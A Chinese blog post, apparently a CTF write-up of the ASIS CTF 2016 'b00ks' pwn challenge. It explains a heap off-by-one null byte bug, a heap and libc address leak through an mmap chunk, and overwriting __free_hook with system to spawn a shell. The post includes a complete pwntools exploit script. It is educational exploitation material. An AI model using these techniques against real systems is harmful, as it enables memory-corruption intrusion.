堆中的off-by-one :ASIS CTF 2016:b00ks

最新推荐文章于 2023-10-02 12:42:32 发布
最新推荐文章于 2023-10-02 12:42:32 发布
阅读量2.4k 收藏
点赞数 1
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36918532/article/details/122454494
版权

ASIS CTF 2016:b00ks

最近在练习pwn题,主要看的是ctf竞赛权威指南这本书,感觉这个题太巧妙了,记录一下

首先拿到文件第一步查看检查:在这里插入图片描述
然后拿到IDA里面看:
在这里插入图片描述
在sub_b6d()函数中使用了一个自己写的read函数(这个函数存在一个off-by-one漏洞)
在这里插入图片描述
在这里插入图片描述

并且可以看到这里name存在off_202018

在这里插入图片描述
分析知道0ff_202010存的是book结构体
二者相差20个偏移在这里插入图片描述
打印就是规中规矩的了,然后看修改作者姓名的,发现仍然是sub_b6d函数,但是在修改的时候就只能溢出一个’\x00‘了,这个一般可以用来修改堆首,修改大小之类的,,但是本次的不涉及

分析完发现就只有一个字节的溢出,还有一些打印,修改,仔细一想不就是通过打印函数来泄露一些东西吗,修改是为了更好的泄露,
那大概的思路就有了,第一次通过打印泄露出堆地址,然后在泄露libc地址,最后修改mallco_hook或者free_hook获取shell
那具体怎么操作呢?又如何泄露libc?我们晓得通过mmap分配的堆块与libc存在固定偏移关系,所以可以通过分配一个超过128k的堆块(0x20000)来打印堆地址泄露libc

1. 首先第一步创建两个book,其中第二个book通过mmap分配
2. 通过print打印出两个堆的地址
3. edit第一个堆块的description来伪造一个fake book且让这个fake book指向book2
4. 通过修改author name来溢出一个空字节,使book1使其指向一个fake book
5. 再次打印可以得到堆的name ptr得到libc偏移地址
6. 然后修改fake book使其des指向free_hook,并再次修改book2将free_hook指向one_gadget
7. 然后删除book2即可获取到shell
第一步:

p.sendlineafter("name: ","A"*0x20)#author_name 
create(0xd0,"AAAA",0x20,"bbbb")#book1
create(0x21000,"/bin/sh",0x21000,"dddd")#book2
print_book()
p.recvuntil("A"*0x20)
book1_addr = u64(p.recvn(6).ljust(8,'\x00'))
print("book1_addr:",hex(book1_addr))
book2_addr = book1_addr + 0x30;
print("book2_addr:",hex(book2_addr))

在这里插入图片描述
拿到堆的地址了,第二步构建fake book

fake_book = p64(1) + p64(book2_addr + 0x8) +p64(book2_addr + 0x10) +p64(0x20)
edit(1,fake_book)

在这里插入图片描述
然后开始溢出,使其指向fake book打印出book的name ptr地址
在这里插入图片描述
在这里插入图片描述
得到偏移为0x5b0010
在这里插入图片描述
然后开始修改使book2的des->free_hook
edit(1, p64(free_hook))
在这里插入图片描述
在这里插入图片描述

在修改book2使其free->指向system
edit(2, p64(system_addr))
在这里插入图片描述

然后修改book的des->bin/sh

在这里插入图片描述

最后将book2 free掉就行了

在这里插入图片描述
拿到shell
最后附上瞎胡画得图还有代码
在这里插入图片描述

from pwn import *

p = process('./b00ks')
#p =remote("node4.buuoj.cn",28734)
context.log_level="debug"
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
elf = ELF('./b00ks')

def create(size,name,dsize,desc):
	p.sendlineafter("> ","1")
	p.recvuntil("Enter book name size: ")
	p.sendline(str(size))
	p.recvuntil("Enter book name (Max 32 chars): ")
	p.sendline(str(name))
	p.recvuntil("Enter book description size: ")
	p.sendline(str(dsize))
	p.recvuntil("Enter book description: ")
	p.sendline(desc)
def delete(idx):
	p.recvuntil("> ")
	p.sendline("2")
	p.recvuntil("Enter the book id you want to delete: ")
	p.sendline(str(idx))

def edit(idx,des):
	p.recvuntil("> ")
	p.sendline("3")
	p.recvuntil("Enter the book id you want to edit: ")
	p.sendline(str(idx))
	p.sendlineafter("description: ",des)

def print_book():
	p.recvuntil("> ")
	p.sendline("4")

def change(name):
	p.sendlineafter("> ",'5')
	p.sendlineafter("name: ",name)


p.sendlineafter("name: ","A"*0x20)#author_name   name he book xiangcha 0x20


create(0xd0,"AAAA",0x20,"bbbb")#book1
create(0x21000,"/bin/sh",0x21000,"dddd")#book2


print_book()
p.recvuntil("A"*0x20)
book1_addr = u64(p.recvn(6).ljust(8,'\x00'))
print("book1_addr:",hex(book1_addr))#0x55deae296130
book2_addr = book1_addr + 0x30;
print("book2_addr:",hex(book2_addr))#0x55deae296160

fake_book = p64(1) + p64(book2_addr + 0x8) +p64(book2_addr + 0x10) +p64(0x20)
edit(1,fake_book)


change("B"*0x20)
print_book()

p.recvuntil("Name: ")

leak_addr = u64(p.recv(6).ljust(8,'\x00'))
print("leak_addr",hex(leak_addr)) #0x00007fcc19363010
libc_base = leak_addr -  0x5b0010
print("libc_base",hex(libc_base))

elf_base = libc_base + libc.sym['free'] - elf.plt['free']
system_addr = libc.sym['system'] + libc_base
sh_addr = libc.search('/bin/sh').next() + libc_base
free_hook = libc.sym['__free_hook'] + libc_base
print("system_addr",hex(system_addr))
print("sh_addr",hex(sh_addr))
print("free_hook",hex(free_hook))

edit(1, p64(free_hook))

edit(2, p64(system_addr))

edit(1, p64(sh_addr))
gdb.attach(p)
delete(2)
 
p.interactive()
是脆脆啊
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Asis CTF 2016 b00ks
Morphy_Amo的博客
02-22 3403
例题 Asis CTF 2016 b00ks ` 题目链接 1. 安全策略 [*] '/root/ctf/Other/pwn/heap/b00ks' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled 开启了full RELRO,因此无法直接进行GOT表劫持。开启了PIE,也导致不能直接用
[Asis CTF 2016] b00ks —— Off-By-One笔记与思考
Tokameine的博客
09-13 1292
前言: 这道题做得有点痛苦......因为本地通常都很难和服务器有相同的环境,使用mmap开辟空间造成的偏移会因此而变得麻烦,并且free_hook周围很难伪造chunk,一度显然恐慌...... 不过本来应该很早就开始Off-By-One的学习的,竟然现在才注意到......惭愧 正文: book结构: struct book { int id; char *name; char *description; in...
[Asis CTF 2016] b00ks
ethan18的博客
08-01 185
这道题主要是用到了Off-By-One漏洞,还有利用mmap成立的堆与libc基址间距相等的原理。
Asis CTF 2016 b00ks(堆溢出NULL byte off-by-one)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-21 1416
Asis CTF 2016 b00ks1.题目获取2.查保护3.分析程序4.地址泄露泄露地址修改地址5.伪造结构体 1.题目获取 题目下载地址:点此下载 2.查保护 3.分析程序 IDA载入,查看main函数 这个函数读取一个名字,最长32个字节。 作者名被读到data段 sub_A89()打印程序功能,并获取用户输入的序号 sub_F55()的功能是添加书籍信息,在这个函数中可以分析到...
CTF(pwn)堆利用 之 off by one
半岛铁盒的博客
07-01 259
简介 利用思路
ctf-writeups:CTF撰写
05-17
准备Docker容器为了毫无问题地运行挑战POC,我为各种Ubuntu版本准备了docker容器。 有关使用容器的说明,请参见。...32 NX Partial RELRO ASLR ret2libc stack overflow CTFtime Writeups档案ASIS
260CT---SkiBookingSystem:第二年小组项目-Jubad Miah,Rakshak Nalukurr,Asis Rai
03-31
Jubad Miah,Rakshak Nalukurr,Asis Rai的第二年小组项目 用于制作系统的程序-Microsoft Visual Studio 2015 注意-如果某些行出现语法错误,则需要添加附加引用。(请参阅引用以获取更多信息) 用于访问系统的...
CTF竞赛权威指南(Pwn篇) 相关资源(python).zip
最新发布
01-16
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...CTF竞赛权威指南(Pwn篇) 相关资源(python).zip
ASIS2XML:用XML表示Ada单元的结构-开源
05-27
ASIS2XML是一个开源项目,其主要功能是将Ada编程语言的ASIS(Ada Source Information System)表示形式转化为XML格式。这一转化过程极大地简化了Ada源代码的数据交换和处理,特别是对于那些依赖XML进行分析、转换或...
ASIS Certified Protection Professional(ASIS-CPP)认证考试题库.docx
07-05
ASIS Certified Protection Professional(ASIS-CPP)认证考试题库
off by one --- Asis CTF 2016 b00ks题解
coco的博客
11-18 565
确定漏洞点 首先,checksec查看开了哪些保护,其中PIE会使我们的调试难度稍稍增加。 再执行程序之后是一个经典的菜单选择,可以大概判断是与堆的利用有关。 通过用ida反编译之后查看,发现有一个关于读的函数会多读入一个\x00,造成了一个null off by one的漏洞。 程序分析 create 函数 创建了book name的堆 创建了book description的堆 创建了b...
初探off-by-one之Asis CTF 2016 b00ks
Vicl1fe的博客
09-25 970
题目链接:ctf-wiki 参考链接:传送门 如果不懂,可以加讨论qq群:946220807 欢迎大佬坐阵 Off-by-one 单字节溢出,顾名思义,可溢出并且只溢出一个字节。具体还是看题吧。实践出真理。 代码分析 拿到题后,是一个图书管理系统,代码实现五个功能 功能: 创建一个图书 删除图书 编辑图书 打印图书内容 修改作者的名字。 程序刚开始,会让你输入作者的名字,可以看到这里调用了...
buu刷题日记 asis2016_b00ks
qq_51474381的博客
05-18 520
1.漏洞点 一个off by null,但和其他堆题的利用不太一样。 输入name时可覆盖heaplist的最低位为0 2.利用思路 1.泄露heap地址 申请大的heap再free掉,show功能正常,直接泄露。 2.泄露libc && 改__free_hook heaplist的第一个指针最低位可覆盖为0,在对应位置伪造结构体,再结合edit和show功能实现任意读写,改freehook为system。 3.shell 申请时写入‘/bin/sh\x00’再
asis2016_b00ks --堆的off-by-null
kissyunlei的博客
02-17 563
非常典型的off-by-null题,思路清晰,结构体指向难找,欢迎师傅们来看
Asis CTF 2016 b00ks理解
weixin_30666753的博客
03-05 285
---恢复内容开始--- 最近在学习堆的off by one,其中遇到这道题,萌新的我弄了大半天才搞懂,网上的很多wp都不是特别详细,都得自己好好调试。 首先,这题目是一个常见的图书馆管理系统,虽然我没见过。 1. Create a book 2. Delete a book 3. Edit a book 4. Print book detail 5. Change ...
[PWN] BUUCTF asis2016_b00ks Offbynull利用
LDX的博客
10-02 162
堆 Offbyone 劫持free_hook
堆溢出off-by-one(asis-ctf-2016 pwnb00ks)
九层台
08-01 2318
这些天积累也知道了一些关于glibc内存的分配策略。 说pwn 是在内存里捉迷藏其实到这里才真正接触大片的内存。精确控制就能保证精确修改数据。 需要的一个很重要的能力就是跟内存的能力。 这里调试exp用gdb.attach(p)来下断点,弹出调试界面。跟踪内存。 用gdb的x命令/xg参数来查看内存以十六进制8字节显示。 这个程序开启了PIE跟踪不太容易,不过可以用find命令查找输入的...
[堆入门off-by-null]asis2016_b00ks
Nashi_Ko的博客
12-02 1285
[BUUCTF] asis2016_b00ks 堆入门off-by-null 刚开始学pwn就听说,堆的题目很魔幻,需要大量的基础知识。在漫长地啃堆基础原理以后,这是我第一次自己研究学习并且完全明白原理的堆题。特地在此做笔记记录。 0x00 逆向分析 一进来就很容易发现,这也是堆题中最为常见的菜单题目。 简单分析一下,打开程序,最先产生交互的函数是sub_B6D。 调用了sub_9F5函数,是作者自己写的read函数,再进去看看。 注意这里的判定:先++buf,然后判断是否达到了最大长度(32字符),
AMADA AP100编程教程:钣金加工与参数设定指南
- **转塔形式管理**:处理标准转塔之外的转塔布置,确保与ASIS100PCL的兼容性。 4. **储存管理**:教程中可能还包括了如何管理和保存模具储存工作的内容,确保数据的安全和有效利用。 通过这个AP100编程教程,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值